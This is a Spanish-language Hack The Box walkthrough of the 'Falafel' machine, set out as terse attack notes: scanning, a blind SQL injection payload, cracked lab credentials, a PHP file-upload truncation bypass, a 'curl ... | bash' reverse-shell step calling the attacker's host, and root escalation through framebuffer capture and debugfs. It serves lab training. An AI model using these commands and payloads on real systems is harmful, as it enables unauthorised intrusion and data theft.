Falafel

Falafel


HTB Linux

nmap -A -p- -oA falafel 10.129.1.83 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA falafel 10.129.1.83

nmap -sU -O -p- -oA falafel-udp 10.129.1.83

nikto -h 10.129.1.83:80

ssh_command.

ssh_command.

whatweb http://10.129.1.83

ssh_command.

http://10.129.1.83/

ssh_command.

wfuzz -c -t 200 —hc-404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.83/FUZZ

ssh_command.

wfuzz -c -t 200 —hc-404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z list,php-txt http://10.129.1.83/FUZZ.FUZ2Z

ssh_command.

http://10.129.1.83/cyberlaw.txt

ssh_command.

Proxy->Options->Miscellaneous Quitar el ultimo boton Dont send items to Proxy history or live tasks, if out of scope.

ssh_command.

Target->Scope->Add Agregar http://10.129.1.83

ssh_command.

Proxy->Intercept->Intercept Server Responses Agregar Intercept responses based on the following rules.

ssh_command.

ssh_command.

Usamos admin’ and substring(username,1,1)=‘a’— -

ssh_command.

Creamos un cluster bomb para fuerza bruta.

ssh_command.

Ponemos el siguiente para la parte de numeros.

ssh_command.

La parte de texto

ssh_command.

ssh_command.

ssh_command.

Corremos el codigo de arriba y lo ponemos en un archivo llamado exploit.py

ssh_command.

Vamos a crackstation y vemos las credenciales.

ssh_command.

credenciales chris:juggling

ssh_command.

No se puede hacer mucho con el usuario de chris

ssh_command.

Guardamos el hash de admin y chris

ssh_command.

It verifies and has a 0 in the beginning so login es exitoso 0==0

ssh_command.

Usamos las credenciales en el login.

ssh_command.

Ahora podemos subir archivos de formato png.

ssh_command.

ssh_command.

Quitamos 4 caracteres y hacemos un archivo png

Creamos un archivo con 240 characteres y le damos un formato de php.png)

ssh_command.

Adquirimos los ultimos 4 caracteres

ssh_command.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q i2Ai

touch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png)

ssh_command.

Llegue a 240 caracteres y lo guarde

ssh_command.

ssh_command.

cat index.html

python3 -m http.server 80

ssh_command.

Al final del cmd ponemos

cmd=curl 10.10.14.105 | bash

ssh_command.

nc -lvnp 443

ssh_command.

credenciales son las siguientes moshe:falafelIsReallyTasty

ssh_command.

su moshe

ssh_command.

uname -a

lsb_release -a

ssh_command.

for group in g$(groups); do echo “El grupo $group”; done

for group in $(groups); do echo -e “\n[+] Listando archivo del sistema con grupo $group asignado:\n; find / -group $group 2>/dev/null;done

ssh_command.

find -name virtual_size 2>/dev/null

cat ./sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0/virtual_size

ssh_command.

cd /tmp

nc 10.10.14.105 443 Captura

ssh_command.

Abrimos el archivo en gimp

ssh_command.

Vemos que yossi tiene una contrasena: MoshePlzStopHackingMe!

ssh_command.

su yossi

whoami

ssh_command.

ls -l /dev/sda1

fdisk -l

ssh_command.

debugfs /dev/sda1

cd root

cat root.txt

ssh_command.

© 2025 Cu3rv0x